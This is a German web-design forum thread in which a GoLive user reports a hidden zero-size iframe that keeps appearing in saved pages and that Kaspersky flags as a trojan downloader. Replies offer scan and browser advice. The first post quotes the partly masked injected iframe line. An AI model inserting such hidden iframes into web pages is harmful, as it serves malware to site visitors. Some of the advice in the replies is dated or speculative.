Autor |
Nachricht |
mittwolf
Threadersteller
Dabei seit: 29.01.2008
Ort: -
Alter: 67
Geschlecht:
|
Verfasst Di 29.01.2008 08:38
Titel Eingeschlichener HTML-Code |
|
|
Hallo,
ganz neu (zumindest mir):
wenn ich mit Golive (egal welche Version) eine Webseite erstelle oder editiere ist nach dem Abspeichern in der letzten Zeile der Seite plötzlich folgender String zu finden:
<iframe src="http://internet.wpvgm.com/cuteqqcn.***" width="0" height="0" frameborder="0"></iframe> (htm habe ich hier zur Sicherheit mal durch *** ersetzt)
Diese Zeile erscheint ohne mein Zutun. Läßt sich zwar löschen, aber bei jedem Speichern oder aktualisieren ist sie wieder da.
Wenn ich dann diese Seite auf meine HP lade und mit dem IE aufrufe erkennt Kaspersky das als Virus 'Trojan-Downloader.VBS.Psyme.mi'
Wenn ich den PC scanne wird mir keine Bodrohung, oder ein Virus angezeigt.
Wie bekomme ich diese automatische Zeilengenerierung oder was immer das ist, wieder wech?
Für jede Hilfe dankbar!
Gruß Wolfgang
|
|
|
|
|
Smooth-Graphics
Dabei seit: 22.05.2006
Ort: -
Alter: -
Geschlecht:
|
Verfasst Di 29.01.2008 08:50
Titel
|
|
|
Also ist diese Codezeile schon direkt auf deinem PC oder wie?
Was für ein Virenprogram nutzt du? Schonmal Rootkit Scan gemacht?
//liegt es vielleicht an einergecrackten Version? Die Cracks sind bei GoLive ziemlich verseucht wenn man mal danach ("GoLive trojan") googelt.
Zuletzt bearbeitet von Smooth-Graphics am Di 29.01.2008 08:53, insgesamt 1-mal bearbeitet
|
|
|
|
|
Anzeige
|
|
|
BEEware
Dabei seit: 19.06.2006
Ort: Karlsruhe
Alter: 40
Geschlecht:
|
Verfasst Di 29.01.2008 09:15
Titel
|
|
|
golive ist tot, es lebe dreamweaver. oder noch besser...notepad
|
|
|
|
|
mittwolf
Threadersteller
Dabei seit: 29.01.2008
Ort: -
Alter: 67
Geschlecht:
|
Verfasst Di 29.01.2008 09:18
Titel
|
|
|
Die Codezeile ist nirgendwo auf dem PC zu finden.
Sie setzt sich erst beim Speichern rein.
Virenprogramm ist Kaspersky Antivirus (aktuell)
Und Golive ist ein echtes gekauftes Programm.
W.
|
|
|
|
|
Raumwurm
Dabei seit: 21.12.2004
Ort: -
Alter: -
Geschlecht:
|
Verfasst Di 29.01.2008 10:14
Titel
|
|
|
Lass doch mal hijackthis drüberlaufen und poste das Log.
|
|
|
|
|
Backware
Dabei seit: 09.12.2004
Ort: bei Köln
Alter: 38
Geschlecht:
|
Verfasst Di 29.01.2008 10:44
Titel
|
|
|
BEEware hat geschrieben: | golive ist tot, es lebe dreamweaver. oder noch besser...notepad |
WENN dann: notepad++
|
|
|
|
|
FloB
Account gelöscht
Ort: -
|
Verfasst Di 29.01.2008 11:09
Titel
|
|
|
Hallo Wolfgang,
diese Variante des Trojaners ist relativ jung. Über die Verbreitung ist derzeit, in dem von dir beschriebenen Rahmen, noch nichts bekannt. Meiner persönlichen Einschätzung nach könnte der Ursprungsvirus durchaus Schule machen.
Aus der Ferne ist dir leider nicht ohne weiteres zu helfen. Dir bleibt nur auf aktualisierte Scanner zu warten.
Im Zusammenhang mit Psymes ist häufig der IE zu lesen, den solltest in jedem Fall durch Opera oder Firefox ersetzen. Achte ausserdem darauf das dein Windows immer schön gepatcht ist, das kann auch Ärger ersparen. Im schlimmsten Fall handelt es sich bei dem Verteiler des HTML-Links um eine Abart von polyMORPH (dessen Quellcode leider öffentlich ist), einem nicht fassbaren Virus, das würde eine Systemneuinstallation nach sich ziehen. An deiner Stelle würde ich ein bis zwei Wochen warten und die einschlägigen Virenseiten (Sophos, Norton, Kaspersky, Avast & BSI.de) checken mit der Hoffnung das dem Problem schnell auf den Grund gegangen wird.
(EDIT: Es liegt mir fern eine Grundsatzdiskussion zu entfachen. Noch sind andere "nackte" Betriebssysteme dem Fenster aus Sicherheitsgründen überlegen)
Viel Erfolg - wenn sich eine Lösung auftut würde sie mich interessieren
Florian
Zuletzt bearbeitet von am Di 29.01.2008 13:02, insgesamt 1-mal bearbeitet
|
|
|
|
|
Pixelpole
Dabei seit: 25.10.2004
Ort: Trier
Alter: 37
Geschlecht:
|
Verfasst Di 29.01.2008 11:26
Titel
|
|
|
Apfel != automatisch sicher
...nur mal so als anmerkung...
|
|
|
|
|
|
|
|
Ähnliche Themen |
HTML/CSS Code
HTML-Code
HTML Code für die Navigation
Fehler im HTML-Code, wo?
Anführungszeichen im HTML-Code
HTML code für Hintergrundbild
|
|